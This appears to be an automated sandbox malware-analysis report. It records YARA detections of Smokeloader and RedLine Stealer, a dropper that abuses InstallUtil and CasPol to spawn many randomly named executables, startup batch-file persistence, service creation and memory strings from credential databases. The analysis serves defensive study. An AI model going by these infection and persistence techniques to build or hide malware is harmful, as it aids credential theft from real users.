                    Source: 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000019.00000002.2841630563.00000000004F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@179/370@0/100
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009C0EC0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,17_2_009C0EC0
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,15_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,15_2_00455E0C
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateServiceA,16_2_004028A4
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateServiceA,17_2_004028A4
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_00402988 CoCreateInstance,MultiByteToWideChar,21_2_00402988
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,14_2_00409C34
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_0040D234 StartServiceCtrlDispatcherA,16_2_0040D234
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_0040D234 StartServiceCtrlDispatcherA,17_2_0040D234
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_004026E9 StartServiceCtrlDispatcherA,17_2_004026E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\ZSwgvRB1MVwrU7ijKh97GNss.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:45400:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:44776:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1892
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:45016:120:WilError_03
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b0344492-8518-4351-9354-89b6b44ee76f
                    Source: Yara matchFile source: 17.0.simplewebbuilder.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.simplewebbuilder.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000000.2392543907.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.3339978515.0000000000401000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.2385672788.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Simple Web Builder Free\is-L72V0.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, type: DROPPED
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" "
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: syncUpd.exe, 00000016.00000003.3061841029.0000000020E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: file.exeVirustotal: Detection: 34%
                    Source: JgqIdYSSt70LQLRUqfTzKJw8.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe "C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp "C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe"
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe"
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe"
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe" Jump to behavior
